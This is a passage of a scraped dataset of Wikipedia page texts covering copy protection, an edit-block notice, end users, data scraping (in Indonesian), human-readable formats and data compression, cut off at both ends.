a free copy. Some even argue that free copies increase profit; people who receive a free copy of a music CD may then go and buy more of that band's music, which they would not have done otherwise. Some publishers have avoided copy-protecting their products on the theory that the resulting inconvenience to their users outweighs any benefit of frustrating "casual copying". From the perspective of the end user, copy protection is always a cost. DRM and license managers sometimes fail, are inconvenient to use, and may not afford the user all of the legal use of the product they have purchased. The term copy protection refers to the technology used to attempt to frustrate copying, and not to the legal remedies available to publishers or authors whose copyrights are violated. Software usage models range from node locking to floating licenses (where a fixed number licenses can be concurrently used across an enterprise), grid computing (where multiple computers function as one unit and so use a common license) and electronic licensing (where features can be purchased and activated online). The term license management refers to broad platforms which enable the specification, enforcement and tracking of software licenses. To safeguard copy protection and license management technologies themselves against tampering and hacking, software anti-tamper methods are used. Floating licenses are also being referred to as Indirect Licenses, and are licenses that at the time they are issued, there is no actual user who will use them. That has some technical influence over some of their characteristics. Direct Licenses are issued after a certain user requires it. As an example, an activated Microsoft product, contains a Direct License which is locked to the PC where the product is installed. From business standpoint, on the other hand, some services now try to monetize on additional services other than the media content so users can have better experience than simply obtaining the copied product. 5 From a technical standpoint, it seems impossible to completely prevent users from making copies of the media they purchase, as long as a "writer" is available that can write to blank media. All types of media require a "player"—a CD player, DVD player, videotape player, computer or video game console—which must be able to read the media in order to display it to a human. Logically, a player could be built that reads the media and then writes an exact copy of what was read to the same type of media. citation needed At a minimum, digital copy protection of non-interactive works is subject to the analog hole: regardless of any digital restrictions, if music can be heard by the human ear, it can also be recorded (at the very least, with a microphone and tape recorder); if a film can be viewed by the human eye, it can also be recorded (at the very least, with a video camera and recorder). In practice, almost-perfect copies can typically be made by tapping into the analog output of a player (e.g. the speaker output or headphone jacks) and, once redigitized into an unprotected form, duplicated indefinitely. Copying text-based content in this way is more tedious, but the same principle applies: if it can be printed or displayed, it can also be scanned and OCRed. With basic software and some patience, these techniques can be applied by a typical computer-literate user. citation needed Since these basic technical facts exist, it follows that a determined individual will definitely succeed in copying any media, given enough time and resources. Media publishers understand this; copy protection is not intended to stop professional operations involved in the unauthorized mass duplication of media, but rather to stop "casual copying". citation needed Copying of information goods which are downloaded (rather than being mass-duplicated as with physical media) can be inexpensively customized for each download, and thus restricted more effectively, in a process known as "traitor tracing". They can be encrypted in a fashion which is unique for each user's computer, and the decryption system can be made tamper-resistant. citation needed Copyright protection in content platforms also cause increased market concentration and a loss in aggregate welfare. According to research on the European Directive on copyright in the Digital Single Market on platform competition, only users of large platforms will be allowed to upload content if the content is sufficiently valuable and network effects are strong. 6 For information on individual protection schemes and technologies, see List of copy protection schemes or relevant category page. Copy protection for computer software, especially for games, has been a long cat-and-mouse struggle between publishers and crackers. These were (and are) programmers who defeated copy protection on software as a hobby, add their alias to the title screen, and then distribute the "cracked" product to the network of warez BBSes or Internet sites that specialized in distributing unauthorized copies of software. When computer software was still distributed in audio cassettes, audio copying was unreliable, while digital copying was time consuming. Software prices were comparable with audio cassette prices. 4 7 To make digital copying more difficult, many programs used non-standard loading methods (loaders incompatible with standard BASIC loaders, or loaders that used different transfer speed). Unauthorized software copying began to be a problem when floppy disks became the common storage media. 7 The ease of copying depended on the system; Jerry Pournelle wrote in BYTE in 1983 that "CP M doesn't lend itself to copy protection" so its users "haven't been too worried" about it, while "Apple users, though, have always had the problem. So have those who used TRS-DOS, and I understand that MS-DOS has copy protection features". 8 Pournelle disliked copy protection 9 and, except for games, refused to review software that used it. He did not believe that it was useful, writing in 1983 that "For every copy protection scheme there's a hacker ready to defeat it. Most involve so-called nibble nybble copiers, which try to analyze the original disk and then make a copy". 8 IBM's Don Estridge agreed: "I guarantee that whatever scheme you come up with will take less time to break than to think of it. While calling piracy "a threat to software development. It's going to dry up the software", he said "It's wrong to copy-protect programs ... There ought to be some way to stop piracy without creating products that are unusable. 10 Copy protection sometimes caused software not to run on clones, such as the Apple II-compatible Laser 128, 11 or even the genuine Commodore 64 with certain peripherals. 12 In 1989 Gilman Louie, head of Spectrum Holobyte, stated that copy protection added about $0.50 per copy to the cost of production of a game. 13 Other software relied on complexity; Antic in 1988 observed that WordPerfect for the Atari ST "is almost unusable without its manual of over 600 pages . 14 (The magazine was mistaken; the ST version was so widely pirated that the company threatened to discontinue it. 15 16 ) To limit reusing activation keys to install the software on multiple machines, it has been attempted to tie the installed software to a specific machine by involving some unique feature of the machine. Serial number in ROM could not be used because some machines do not have them. Some popular surrogate for a machine serial number were date and time (to the second) of initialization of the hard disk or MAC address of Ethernet cards (although this is programmable on modern cards). With the rise of virtualization, however, the practice of locking has to add to these simple hardware parameters to still prevent copying. 17 During the 1980s and 1990s, video games sold on audio cassette and floppy disks were sometimes protected with an external user-interactive method that demanded the user to have the original package or a part of it, usually the manual. Copy protection was activated not only at installation, but every time the game was executed. 18 19 Several imaginative and creative methods have been employed, in order to be both fun and hard to copy. These include: 20 All of these methods proved to be troublesome and tiring for the players, and as such greatly declined in usage by the mid 1990s, at which point the emergence of CDs as the primary video game medium made copy protection largely redundant, since CD copying technology was not widely available at the time. 18 Some game developers, such as Markus Persson, 24 have encouraged consumers and other developers to embrace the reality of unlicensed copying and utilize it positively to generate increased sales and marketing interest. Starting in 1985 with the video release of The Cotton Club (Beta and VHS versions only), Macrovision licensed to publishers a technology that exploits the automatic gain control feature of VCRs by adding pulses to the vertical blanking sync signal. 25 These pulses may negatively affect picture quality, but succeed in confusing the recording-level circuitry of many consumer VCRs. This technology, which is aided by U.S. legislation mandating the presence of automatic gain-control circuitry in VCRs, is said to "plug the analog hole" and make VCR-to-VCR copies impossible, although an inexpensive circuit is widely available that will defeat the protection by removing the pulses. Macrovision had patented methods of defeating copy prevention, 26 giving it a more straightforward basis to shut down manufacture of any device that descrambles it than often exists in the DRM world. While used for pre-recorded tapes, the system was not adopted for television broadcasts; Michael J. Fuchs of HBO said in 1985 that Macrovision was "not good technology" because it reduced picture quality and consumers could easily bypass it, while Peter Chernin of Showtime said "we want to accommodate our subscribers and we know they like to tape our movies". 27 Over time, software publishers (especially in the case of video games) became creative about crippling the software in case it was duplicated. These games would initially show that the copy was successful, but eventually render themselves unplayable via subtle methods. Many games use the "code checksumming" technique to prevent alteration of code to bypass other copy protection. Important constants for the game - such as the accuracy of the player's firing, the speed of their movement, etc. - are not included in the game but calculated from the numbers making up the machine code of other parts of the game. If the code is changed, the calculation yields a result which no longer matches the original design of the game and the game plays improperly. Copying commercial games, such as this one, is a criminal offense and copyright infringement. Copying and re-supplying games such as this one can lead to a term of imprisonment. Think of a pirated game as stolen property. This game is protected by the FADE system. You can play with a pirated game- but not for long. The quality of a pirated game will degrade over time. Purchase only genuine software at legitimate stores. The usage of copy protection payloads which lower playability of a game without making it clear that this is a result of copy protection is now generally considered unwise, due to the potential for it to result in unaware players with unlicensed copies spreading word-of-mouth that a game is of low quality. The authors of FADE explicitly acknowledged this as a reason for including the explicit warning message. Anti-piracy measures are efforts to fight against copyright infringement, counterfeiting, and other violations of intellectual property laws. It includes, but is by no means limited to, the combined efforts of corporate associations (such as the RIAA and MPAA), law enforcement agencies (such as the FBI and Interpol), and various international governments clarification needed to combat copyright infringement relating to various types of creative works, such as software, music and films. These measures often come in the form of copy protection measures such as DRM, or measures implemented through a content protection network, such as Distil Networks or Incapsula. Richard Stallman and the GNU Project have criticized the use of the word "piracy" in these situations, saying that publishers use the word to refer to "copying they don't approve of" and that "they publishers imply that it is ethically equivalent to attacking ships on the high seas, kidnapping and murdering the people on them". 38 Certain forms of anti-piracy (such as DRM) are considered by consumers to control the use of the products content after sale. In the case MPAA v. Hotfile, Judge Kathleen M. Williams granted a motion to deny the prosecution the usage of words she views as "pejorative". This list included the word "piracy", the use of which, the motion by the defense stated, would serve no purpose but to misguide and inflame the jury. The plaintiff argued the common use of the terms when referring to copyright infringement should invalidate the motion, but the Judge did not concur. 39 Today copyright infringement is often facilitated by the use of file sharing. In fact, infringement accounts for 23.8% of all internet traffic in 2013. 40 In an effort to cut down on this, both large and small films and music corporations have issued DMCA takedown notices, filed lawsuits, and pressed criminal prosecution of those who host these file sharing services. 41 42 43 44 The EURion constellation is used by many countries to prevent color photocopiers from producing counterfeit currency. The Counterfeit Deterrence System is used to prevent counterfeit bills from being produced by image editing software. 45 Similar technology has been proposed 46 to prevent 3D printing of firearms, for reasons of gun control rather than copyright. |
220 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=12 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Web scraping. |
221 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/End-user | In product development, an end user (sometimes end-user) a is a person who ultimately uses or is intended to ultimately use a product. 1 2 3 The end user stands in contrast to users who support or maintain the product, 4 such as sysops, system administrators, database administrators, 5 information technology (IT) experts, software professionals, and computer technicians. End users typically do not possess the technical understanding or skill of the product designers, 6 a fact easily overlooked and forgotten by designers: leading to features creating low customer satisfaction. 2 In information technology, end users are not customers in the usual sense—they are typically employees of the customer. 7 For example, if a large retail corporation buys a software package for its employees to use, even though the large retail corporation was the customer that purchased the software, the end users are the employees of the company, who will use the software at work. End users are one of the three major factors contributing to the complexity of managing information systems. The end user's position has changed from a position in the 1950s (where end users did not interact with the mainframe; computer experts programmed and ran the mainframe) to one in the 2010s where the end user collaborates with and advises the management information system and Information Technology department about his or her needs regarding the system or product. This raises new questions, such as: Who manages each resource?, What is the role of the MIS Department? and What is the optimal relationship between the end-user and the MIS Department? 8 The concept of end-user first surfaced in the late 1980s and has since then raised many debates. One challenge was the goal to give both the user more freedom, by adding advanced features and functions (for more advanced users) and adding more constraints (to prevent a neophyte user from accidentally erasing an entire company's database). 9 This phenomenon appeared as a consequence of consumerization of computer products and software. In the 1960s and 1970s, computer users were generally programming experts and computer scientists. However, in the 1980s, and especially in the mid-to-late 1990s and the early 2000s, everyday, regular people began using computer devices and software for personal and work use. IT specialists needed to cope with this trend in various ways. In the 2010s, users now want to have more control over the systems they operate, to solve their own problems, and be able to customize the systems to suit their needs. The apparent drawbacks were the risk of corruption of the systems and data the users had control of, due to their lack of knowledge on how to properly operate the computer software at an advanced level. 10 For companies to appeal to the user, it took primary care to accommodate and think of end-users in their new products, software launches, and updates. A partnership needed to be formed between the programmer-developers and the everyday end users so both parties could maximize the use of the products effectively. 11 A major example of the public's effects on end user's requirements were the public libraries. They have been affected by new technologies in many ways, ranging from the digitalization of their card catalog, the shift to e-books, e-journals, and offering online services. Libraries have had to undergo many changes in order to cope, 12 including training existing librarians in Web 2.0 and database skills, to hiring IT and software experts. The aim of end user documentation (e.g., manuals and guidebooks for products) is to help the user understand certain aspects of the systems and to provide all the answers in one place. 13 A lot of documentation is available for users to help them understand and properly use a certain product or service. Due to the fact that the information available is usually very vast, inconsistent or ambiguous (e.g., a user manual with hundreds of pages, including guidance on using advanced features), many users suffer from an information overload. Therefore, they become unable to take the right course of action. This needs to be kept in mind when developing products and services and the necessary documentation for them. 14 Well-written documentation is needed for a user to reference. Some key aspects of such a documentation are: 13 At times users do not refer to the documentation available to them due to various reasons, ranging from finding the manual too large or due to not understanding the jargon and acronyms it contains. In other cases, the users may find that the manual makes too many assumptions about a user having pre-existing knowledge of computers and software, and thus the directions may skip over these initial steps (from the users' point of view). Thus, frustrated user may report false problems because of their inability to understand the software or computer hardware. This in turn causes the company to focus on perceived problems instead of focusing on the actual problems of the software. 15 In the 2010s, there is a lot of emphasis on user's security and privacy. With the increasing role that computers are playing in people's lives, people are carrying laptops and smartphones with them and using them for scheduling appointments, making online purchases using credit cards and searching for information. These activities can potentially be observed by companies, governments or individuals, which can lead to breaches of privacy, identity theft, by, blackmailing and other serious concerns. As well, many businesses, ranging from small business startups to huge corporations are using computers and software to design, manufacture, market and sell their products and services, and businesses also use computers and software in their back office processes (e.g., human resources, payroll, etc.). As such, it is important for people and organizations to need know that the information and data they are storing, using, or sending over computer networks or storing on computer systems is secure. However, developers of software and hardware are faced with many challenges in developing a system that can be both user friendly, accessible 24 7 on almost any device and be truly secure. Security leaks happen, even to individuals and organizations that have security measures in place to protect their data and information (e.g., firewalls, encryption, strong passwords). The complexities of creating such a secure system come from the fact that the behaviour of humans is not always rational or predictable. Even in a very-well secured computer system, a malicious individual can telephone a worker and pretend to be a private investigator working for the software company, and ask for the individual's password, a dishonest process called phishing. As well, even with a well-secured system, if a worker decides to put the company's electronic files on a USB drive to take them home to work on them over the weekend (against many companies' policies), and then loses this USB drive, the company's data may be compromised. Therefore, developers need to make systems that are intuitive to the user in order to have information security and system security. 16 Another key step to end user security is informing the people and employees about the security threats and what they can do to avoid them or protect themselves and the organization. Clearly underlining, the capabilities and risks makes users more aware and informed whilst they are using the products. Some situations that could put the user at risk are: Even if the security measures in place are strong, the choices the user makes and his her behavior have a major impact on how secure their information really is. Therefore, an informed user is one who can protect and achieve the best security out of the system they use. 17 Because of the importance of end-user security and the impact it can have on organizations the UK government set out a guidance for the public sector, to help civil servants learn how to be more security aware when using government networks and computers. While this is targeted to a certain sector, this type of educational effort can be informative to any type of user. This helps developers meet security norms and end users be aware of the risks involved. 18 Reimers and Andersson have conducted a number of studies on end-user security habits and found that the same type of repeated education training in security best practices can have a marked effect on the perception of compliance with good end-user network security habits, especially concerning malware and ransomware. 19 In end-user license agreements, the end user is distinguished from the value-added reseller, who installs the software or the organization that purchases and manages the software. 20 failed verification Certain American defense-related products and information require export approval from the United States Government under the International Traffic in Arms Regulations and Export Administration Regulations. 21 In order to obtain a license to export, the exporter must specify both the end user and the end use for undertaking an end-user certificate. 22 In the UK, there exist documents that accompany licenses for products named in the end user undertaking statements. clarification needed 23 |
222 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Category:Web_crawlers | This category has the following 2 subcategories, out of 2 total. The following 19 pages are in this category, out of 19 total. This list may not reflect recent changes. |
223 | https://en.wikipedia.org/wiki/Data_scraping | https://id.wikipedia.org/wiki/Pengorekan_data | Pengorekan data atau dapat disebut dengan data scrapping adalah teknik otomatisasi yang digunakkan untuk mengekstrak dan pengolahan data dari sebuah website, databse, aplikasi enterprise atau sistem legacy yang disimpan pada sebuah file dalam format tabular atau spreadsheet, selain itu teknik ini juga cukup mudah digunakkan karena dapat memberikan informasi yang dapat dibaca secara nyata. 1 2 cara yang digunakkan untuk memperoleh data dari web dapat menggunakan tools, yang mempunyai tahapan yang pertama adalah proses request ke web dengan command GET untuk mengekstrak data, selanjutnya adalah parse dimana data spesifik yang dihasilkan dari tools data scrapping, kemudian informasi yang telah didapat akan ditampilkan pada display. 1 2 data scrapping memiliki dua jenis yang berbeda yaitu web scrapping dan screenscrapping. web scrapping adalah cara yang digunakan untuk pengekstrakan data secara spesifik yang diambil dari sebuah website dengan menggunakan pengaksesan pada source code, source code yanng dapat digunakan seperti HTML, CSS dan javascript ataupun penggunaan API yang disediakan oleh pemilik website itu sendiri. sedangkan screen scrapping adalah tipe pengekstrakan data dengan menggunakan metode analisis visual interfances yang terdapat pada web dan dapat dilihat secara langsung. 1 2 |
224 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Human-readable_medium | In computing, a human-readable medium or human-readable format is any encoding of data or information that can be naturally read by humans, resulting in human-readable data. It is often encoded as ASCII or Unicode text, rather than as binary data. In most contexts, the alternative to a human-readable representation is a machine-readable format or medium of data primarily designed for reading by electronic, mechanical or optical devices, or computers. For example, Universal Product Code (UPC) barcodes are very difficult to read for humans, but very effective and reliable with the proper equipment, whereas the strings of numerals that commonly accompany the label are the human-readable form of the barcode information. Since any type of data encoding can be parsed by a suitably programmed computer, the decision to use binary encoding rather than text encoding is usually made to conserve storage space. Encoding data in a binary format typically requires fewer bytes of storage and increases efficiency of access (input and output) by eliminating format parsing or conversion. With the advent of standardized, highly structured markup languages, such as Extensible Markup Language (XML), the decreasing costs of data storage, and faster and cheaper data communication networks, compromises between human-readability and machine-readability are now more common-place than they were in the past. This has led to humane markup languages and modern configuration file formats that are far easier for humans to read. In addition, these structured representations can be compressed very effectively for transmission or storage. Human-readable protocols greatly reduce the cost of debugging. 1 Various organizations have standardized the definition of human-readable and machine-readable data and how they are applied in their respective fields of application, e.g., the Universal Postal Union. 2 Often the term human-readable is also used to describe shorter names or strings, that are easier to comprehend or to remember than long, complex syntax notations, such as some Uniform Resource Locator strings. 3 Occasionally "human-readable" is used to describe ways of encoding an arbitrary integer into a long series of English words. Compared to decimal or other compact binary-to-text encoding systems, English words are easier for humans to read, remember, and type in. 4 This computer science article is a stub. You can help Wikipedia by expanding it. |
225 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_compression | In information theory, data compression, source coding, 1 or bit-rate reduction is the process of encoding information using fewer bits than the original representation. 2 Any particular compression is either lossy or lossless. Lossless compression reduces bits by identifying and eliminating statistical redundancy. No information is lost in lossless compression. Lossy compression reduces bits by removing unnecessary or less important information. 3 Typically, a device that performs data compression is referred to as an encoder, and one that performs the reversal of the process (decompression) as a decoder. The process of reducing the size of a data file is often referred to as data compression. In the context of data transmission, it is called source coding: encoding is done at the source of the data before it is stored or transmitted. 4 Source coding should not be confused with channel coding, for error detection and correction or line coding, the means for mapping data onto a signal. Data Compression algorithms present a space-time complexity trade-off between the bytes needed to store or transmit information, and the Computational resources needed to perform the encoding and decoding. The design of data compression schemes involves balancing the degree of compression, the amount of distortion introduced (when using lossy data compression), and the computational resources or time required to compress and decompress the data. 5 Lossless data compression algorithms usually exploit statistical redundancy to represent data without losing any information, so that the process is reversible. Lossless compression is possible because most real-world data exhibits statistical redundancy. For example, an image may have areas of color that do not change over several pixels; instead of coding "red pixel, red pixel, ... the data may be encoded as "279 red pixels". This is a basic example of run-length encoding; there are many schemes to reduce file size by eliminating redundancy. The Lempel Ziv (LZ) compression methods are among the most popular algorithms for lossless storage. 6 DEFLATE is a variation on LZ optimized for decompression speed and compression ratio, but compression can be slow. In the mid 1980s, following work by Terry Welch, the Lempel Ziv Welch (LZW) algorithm rapidly became the method of choice for most general-purpose compression systems. LZW is used in GIF images, programs such as PKZIP, and hardware devices such as modems. 7 LZ methods use a table-based compression model where table entries are substituted for repeated strings of data. For most LZ methods, this table is generated dynamically from earlier data in the input. The table itself is often Huffman encoded. Grammar-based codes like this can compress highly repetitive input extremely effectively, for instance, a biological data collection of the same or closely related species, a huge versioned document collection, internet archival, etc. The basic task of grammar-based codes is constructing a context-free grammar deriving a single string. Other practical grammar compression algorithms include Sequitur and Re-Pair. The strongest modern lossless compressors use probabilistic models, such as prediction by partial matching. The Burrows Wheeler transform can also be viewed as an indirect form of statistical modelling. 8 In a further refinement of the direct use of probabilistic modelling, statistical estimates can be coupled to an algorithm called arithmetic coding. Arithmetic coding is a more modern coding technique that uses the mathematical calculations of a finite-state machine to produce a string of encoded bits from a series of input data symbols. It can achieve superior compression compared to other techniques such as the better-known Huffman algorithm. It uses an internal memory state to avoid the need to perform a one-to-one mapping of individual input symbols to distinct representations that use an integer number of bits, and it clears out the internal memory only after encoding the entire string of data symbols. Arithmetic coding applies especially well to adaptive data compression tasks where the statistics vary and are context-dependent, as it can be easily coupled with an adaptive model of the probability distribution of the input data. An early example of the use of arithmetic coding was in an optional (but not widely used) feature of the JPEG image coding standard. 9 It has since been applied in various other designs including H.263, H.264 MPEG 4 AVC and HEVC for video coding. 10 Archive software typically has the ability to adjust the "dictionary size", where a larger size demands more random-access memory during compression and decompression, but compresses stronger, especially on repeating patterns in files' content. 11 12 In the late 1980s, digital images became more common, and standards for lossless image compression emerged. In the early 1990s, lossy compression methods began to be widely used. 13 In these schemes, some loss of information is accepted as dropping nonessential detail can save storage space. There is a corresponding trade-off between preserving information and reducing size. Lossy data compression schemes are designed by research on how people perceive the data in question. For example, the human eye is more sensitive to subtle variations in luminance than it is to the variations in color. JPEG image compression works in part by rounding off nonessential bits of information. 14 A number of popular compression formats exploit these perceptual differences, including psychoacoustics for sound, and psychovisuals for images and video. Most forms of lossy compression are based on transform coding, especially the discrete cosine transform (DCT). It was first proposed in 1972 by Nasir Ahmed, who then developed a working algorithm with T. Natarajan and K. R. Rao in 1973, before introducing it in January 1974. 15 16 DCT is the most widely used lossy compression method, and is used in multimedia formats for images (such as JPEG and HEIF), 17 video (such as MPEG, AVC and HEVC) and audio (such as MP3, AAC and Vorbis). Lossy image compression is used in digital cameras, to increase storage capacities. Similarly, DVDs, Blu-ray and streaming video use lossy video coding formats. Lossy compression is extensively used in video. In lossy audio compression, methods of psychoacoustics are used to remove non-audible (or less audible) components of the audio signal. Compression of human speech is often performed with even more specialized techniques; speech coding is distinguished as a separate discipline from general-purpose audio compression. Speech coding is used in internet telephony, for example, audio compression is used for CD ripping and is decoded by the audio players. 8 Lossy compression can cause generation loss. The theoretical basis for compression is provided by information theory and, more specifically, Shannon's source coding theorem; domain-specific theories include algorithmic information theory for lossless compression and rate distortion theory for lossy compression. These areas of study were essentially created by Claude Shannon, who published fundamental papers on the topic in the late 1940s and early 1950s. Other topics associated with compression include coding theory and statistical inference. 18 There is a close connection between machine learning and compression. A system that predicts the posterior probabilities of a sequence given its entire history can be used for optimal data compression (by using arithmetic coding on the output distribution). Conversely, an optimal compressor can be used for prediction (by finding the symbol that compresses best, given the previous history). This equivalence has been used as a justification for using data compression as a benchmark for "general intelligence". 19 20 21 An alternative view can show compression algorithms implicitly map strings into implicit feature space vectors, and compression-based similarity measures compute similarity within these feature spaces. For each compressor C(.) we define an associated vector space , such that C(.) maps an input string x, corresponding to the vector norm x . An exhaustive examination of the feature spaces underlying all compression algorithms is precluded by space; instead, feature vectors chooses to examine three representative lossless compression methods, LZW, LZ77, and PPM. 22 According to AIXI theory, a connection more directly explained in Hutter Prize, the best possible compression of x is the smallest possible software that generates x. For example, in that model, a zip file's compressed size includes both the zip file and the unzipping software, since you can not unzip it without both, but there may be an even smaller combined form. Examples of AI-powered audio video compression software include NVIDIA Maxine, AIVC. 23 Examples of software that can perform AI-powered image compression include OpenCV, TensorFlow, MATLAB's Image Processing Toolbox (IPT) and High-Fidelity Generative Image Compression. 24 In unsupervised machine learning, k-means clustering can be utilized to compress data by grouping similar data points into clusters. This technique simplifies handling extensive datasets that lack predefined labels and finds widespread use in fields such as image compression. 25 Data compression aims to reduce the size of data files, enhancing storage efficiency and speeding up data transmission. K-means clustering, an unsupervised machine learning algorithm, is employed to partition a dataset into a specified number of clusters, k, each represented by the centroid of its points. This process condenses extensive datasets into a more compact set of representative points. Particularly beneficial in image and signal processing, k-means clustering aids in data reduction by replacing groups of data points with their centroids, thereby preserving the core information of the original data while significantly decreasing the required storage space. 26 Large language models (LLMs) are also capable of lossless data compression, as demonstrated by DeepMind's research with the Chinchilla 70B model. Developed by DeepMind, Chinchilla 70B effectively compressed data, outperforming conventional methods such as Portable Network Graphics (PNG) for images and Free Lossless Audio Codec (FLAC) for audio. It achieved compression of image and audio data to 43.4% and 16.4% of their original sizes, respectively. 27 Data compression can be viewed as a special case of data differencing. 28 29 Data differencing consists of producing a difference given a source and a target, with patching reproducing the target given a source and a difference. Since there is no separate source and target in data compression, one can consider data compression as data differencing with empty source data, the compressed file corresponding to a difference from nothing. This is the same as considering absolute entropy (corresponding to data compression) as a special case of relative entropy (corresponding to data differencing) with no initial data. The term differential compression is used to emphasize the data differencing connection. Entropy coding originated in the 1940s with the introduction of Shannon Fano coding, 30 the basis for Huffman coding which was developed in 1950. 31 Transform coding dates back to the late 1960s, with the introduction of fast Fourier transform (FFT) coding in 1968 and the Hadamard transform in 1969. 32 An important image compression technique is the discrete cosine transform (DCT), a technique developed in the early 1970s. 15 DCT is the basis for JPEG, a lossy compression format which was introduced by the Joint Photographic Experts Group (JPEG) in 1992. 33 JPEG greatly reduces the amount of data required to represent an image at the cost of a relatively small reduction in image quality and has become the most widely used image file format. 34 35 Its highly efficient DCT-based compression algorithm was largely responsible for the wide proliferation of digital images and digital photos. 36 Lempel Ziv Welch (LZW) is a lossless compression algorithm developed in 1984. It is used in the GIF format, introduced in 1987. 37 DEFLATE, a lossless compression algorithm specified in 1996, is used in the Portable Network Graphics (PNG) format. 38 Wavelet compression, the use of wavelets in image compression, began after the development of DCT coding. 39 The JPEG 2000 standard was introduced in 2000. 40 In contrast to the DCT algorithm used by the original JPEG format, JPEG 2000 instead uses discrete wavelet transform (DWT) algorithms. 41 42 43 JPEG 2000 technology, which includes the Motion JPEG 2000 extension, was selected as the video coding standard for digital cinema in 2004. 44 Audio data compression, not to be confused with dynamic range compression, has the potential to reduce the transmission bandwidth and storage requirements of audio data. Audio compression formats compression algorithms are implemented in software as audio codecs. In both lossy and lossless compression, information redundancy is reduced, using methods such as coding, quantization, DCT and linear prediction to reduce the amount of information used to represent the uncompressed data. Lossy audio compression algorithms provide higher compression and are used in numerous audio applications including Vorbis and MP3. These algorithms almost all rely on psychoacoustics to eliminate or reduce fidelity of less audible sounds, thereby reducing the space required to store or transmit them. 2 45 The acceptable trade-off between loss of audio quality and transmission or storage size depends upon the application. For example, one 640 MB compact disc (CD) holds approximately one hour of uncompressed high fidelity music, less than 2 hours of music compressed losslessly, or 7 hours of music compressed in the MP3 format at a medium bit rate. A digital sound recorder can typically store around 200 hours of clearly intelligible speech in 640 MB. 46 Lossless audio compression produces a representation of digital data that can be decoded to an exact digital duplicate of the original. Compression ratios are around 50 60% of the original size, 47 which is similar to those for generic lossless data compression. Lossless codecs use curve fitting or linear prediction as a basis for estimating the signal. Parameters describing the estimation and the difference between the estimation and the actual signal are coded separately. 48 A number of lossless audio compression formats exist. See list of lossless codecs for a listing. Some formats are associated with a distinct system, such as Direct Stream Transfer, used in Super Audio CD and Meridian Lossless Packing, used in DVD-Audio, Dolby TrueHD, Blu-ray and HD DVD. Some audio file formats feature a combination of a lossy format and a lossless correction; this allows stripping the correction to easily obtain a lossy file. Such formats include MPEG 4 SLS (Scalable to Lossless), WavPack, and OptimFROG DualStream. When audio files are to be processed, either by further compression or for editing, it is desirable to work from an unchanged original (uncompressed or losslessly compressed). Processing of a lossily compressed file for some purpose usually produces a final result inferior to the creation of the same compressed file from an uncompressed original. In addition to sound editing or mixing, lossless audio compression is often used for archival storage, or as master copies. Lossy audio compression is used in a wide range of applications. In addition to standalone audio-only applications of file playback in MP3 players or computers, digitally compressed audio streams are used in most video DVDs, digital television, streaming media on the Internet, satellite and cable radio, and increasingly in terrestrial radio broadcasts. Lossy compression typically achieves far greater compression than lossless compression, by discarding less-critical data based on psychoacoustic optimizations. 49 Psychoacoustics recognizes that not all data in an audio stream can be perceived by the human auditory system. Most lossy compression reduces redundancy by first identifying perceptually irrelevant sounds, that is, sounds that are very hard to hear. Typical examples include high frequencies or sounds that occur at the same time as louder sounds. Those irrelevant sounds are coded with decreased accuracy or not at all. Due to the nature of lossy algorithms, audio quality suffers a digital generation loss when a file is decompressed and recompressed. This makes lossy compression unsuitable for storing the intermediate results in professional audio engineering applications, such as sound editing and multitrack recording. However, lossy formats such as MP3 are very popular with end-users as the file size is reduced to 5 20% of the original size and a megabyte can store about a minute's worth of music at adequate quality. Several proprietary lossy compression algorithms have been developed that provide higher quality audio performance by using a combination of lossless and lossy algorithms with adaptive bit rates and lower compression ratios. Examples include aptX, LDAC, LHDC, MQA and SCL6. To determine what information in an audio signal is perceptually irrelevant, most lossy compression algorithms use transforms such as the modified discrete cosine transform (MDCT) to convert time domain sampled waveforms into a transform domain, typically the frequency domain. Once transformed, component frequencies can be prioritized according to how audible they are. Audibility of spectral components is assessed using the absolute threshold of hearing and the principles of simultaneous masking—the phenomenon wherein a signal is masked by another signal separated by frequency—and, in some cases, temporal masking—where a signal is masked by another signal separated by time. Equal-loudness contours may also be used to weigh the perceptual importance of components. Models of the human ear-brain combination incorporating such effects are often called psychoacoustic models. 50 Other types of lossy compressors, such as the linear predictive coding (LPC) used with speech, are source-based coders. LPC uses a model of the human vocal tract to analyze speech sounds and infer the parameters used by the model to produce them moment to moment. These changing parameters are transmitted or stored and used to drive another model in the decoder which reproduces the sound. Lossy formats are often used for the distribution of streaming audio or interactive communication (such as in cell phone networks). In such applications, the data must be decompressed as the data flows, rather than after the entire data stream has been transmitted. Not all audio codecs can be used for streaming applications. 49 Latency is introduced by the methods used to encode and decode the data. Some codecs will analyze a longer segment, called a frame, of the data 